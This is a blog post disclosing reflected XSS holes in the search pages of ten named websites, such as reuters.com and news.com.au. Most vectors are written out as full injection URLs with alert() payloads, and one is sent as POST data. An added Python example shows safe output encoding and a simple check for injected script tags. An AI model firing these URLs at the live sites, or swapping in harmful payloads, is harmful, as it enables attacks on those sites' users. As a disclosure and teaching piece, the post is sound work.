I had some spare time last weekend and decided to go XSS hunting. Yeah, I know: old news, old vectors, boooring...
Unfortunately, even though XSS is old news in the security community and there are well-established techniques to mitigate the attack, it is still ridiculously easy to find XSS vulnerabilities in most websites today. It seems the message isn't getting through.
Get all the details after the break, or use the quick links below
businessday.com.au
carsguide.com.au
conceptart.org
investsmart.com.au
mycareer.com.au
news.com.au
reuters.com
stayz.com.au
three.com.au
thebigchair.com.au
All XSS vectors displayed here were reported last weekend and some may have been fixed.
Businessday.com.au;
http://www.businessday.com.au/execute_search.html?text='><script>alert('zombies ahead!');</script><&ss=Business
Carsguide.com.au;
http://www.carsguide.com.au/search/?type=all&Ntt=<script>alert('ZOMBIES AHEAD');</script><
Conceptart.org;
http://www.conceptart.org/index.php?artist=%22%3E%3C/a%3E%3Cscript%3Ealert%28%27ZOMBIES%20AHEAD%27%29;%3C/script%3E%3C
Investsmart.com.au;
http://www.investsmart.com.au/search/?MainSearch=%22%3E%3Cscript%3Ealert(%22ZOMBIES+AHEAD!%22)%3B%3C%2Fscript%3E%3C
Mycareer.com.au;
http://mycareer.com.au/jobseeker/search/results.aspx?s=155&sq=%3C%2ftitle%3E%3Cscript%3Ealert(%27ZOMBIES+AHEAD!%27)%3b%3C%2fscript%3E%3C
News.com.au;
http://search.news.com.au/search?q=abc%3C%2Ftitle%3E%3Cscript%3Ealert%28String.fromCharCode%2890,79,77,66,73,69,83,32,65,72,69,65,68,33%29%29;%3C/script%3E%3C&sid=&us=&as=&ac=&r=typed
Reuters.com;
http://www.reuters.com/search?blob=%22%3E%3Cscript%3Ealert(%27ZOMBIES%20AHEAD!%27);%3C/script%3E%3C
Stayz.com.au;
http://www.stayz.com.au/search.action
POSTDATA: locId=0&locLevel=&location=%22%3E%3Cscript%3Ealert%28%27ZOMBIES+AHEAD%21%27%29%3B%3C%2Fscript%3E%3C&checkin=&numNights=1&minPrice=0&maxPrice=0&numGuests=1&rating=0
Three.com.au;
http://shop.three.com.au/search/searchResult.jsp?query=%22;%3C/script%3E%3Cscript%3Ealert%28%27ZOMBIES%20AHEAD!%27%29;%3C/script%3E%3C&_requestid=542403
Thebigchair.com.au;
http://thebigchair.com.au/consumer/search/results.aspx?q=%3cscript%3ealert(%27zombies+ahead!%27)%3b%3c%2fscript%3e
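The vectors above all work the same way: a search term is reflected unencoded into a page, and the payload closes the context it lands in (an attribute value, the `<title>` element, or a JavaScript string inside `<script>`). As an added example (not code from the original post or from any of the sites listed), here is a minimal search-page template rendered with and without context-aware output encoding, checked against payloads decoded from the URLs on this page. The template and function names are assumptions.

```python
import html
import json

# Constructed payloads, decoded from the URLs above: one per reflection context.
ATTR_BREAKOUT = '"><script>alert(\'ZOMBIES AHEAD!\');</script><'       # closes value="..."
TITLE_BREAKOUT = "</title><script>alert('ZOMBIES AHEAD!');</script><"   # closes <title>
JS_STRING_BREAKOUT = '";</script><script>alert(\'ZOMBIES AHEAD!\');</script><'  # closes "..." in <script>


def render_unsafe(query: str) -> str:
    """Reflects the search term verbatim into three contexts (the bug behind the vectors above)."""
    return (
        f"<title>Search: {query}</title>"
        f'<input name="q" value="{query}">'
        f'<script>var q = "{query}";</script>'
    )


def js_string(value: str) -> str:
    """Encode for a JS string literal inside <script>. json.dumps quotes and escapes the value;
    '<' and '>' are additionally written as \\u003c / \\u003e so that '</script>' inside the
    string can never terminate the script element for the HTML parser."""
    return json.dumps(value).replace("<", "\\u003c").replace(">", "\\u003e")


def render_safe(query: str) -> str:
    """Same template, but every insertion is encoded for the context it lands in:
    HTML text and attribute values via html.escape (quotes included), JS via js_string."""
    return (
        f"<title>Search: {html.escape(query)}</title>"
        f'<input name="q" value="{html.escape(query)}">'
        f"<script>var q = {js_string(query)};</script>"
    )


def injects_script(page: str) -> bool:
    """Crude detection for this template: it legitimately contains exactly one <script> start tag,
    so any additional one was introduced by the reflected input."""
    return page.lower().count("<script>") > 1


if __name__ == "__main__":
    for name, payload in [("attr", ATTR_BREAKOUT), ("title", TITLE_BREAKOUT), ("js", JS_STRING_BREAKOUT)]:
        print(name, "unsafe:", injects_script(render_unsafe(payload)),
              "safe:", injects_script(render_safe(payload)))
```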